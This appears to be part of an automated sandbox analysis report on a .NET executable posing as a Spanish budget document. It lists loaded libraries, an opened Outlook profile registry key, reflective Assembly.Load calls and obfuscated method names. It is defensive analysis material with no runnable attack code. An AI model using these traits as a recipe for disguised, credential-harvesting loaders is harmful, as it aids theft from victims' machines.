Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dpapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: agpG.pdb source: PRESUPUESTO DE NOVIEMBRE...exe
Source:	Binary string: agpG.pdbSHA256 source: PRESUPUESTO DE NOVIEMBRE...exe

Data Obfuscation

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.3f95ad0.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.77d0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: section name: .text entropy: 7.689072386621162

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
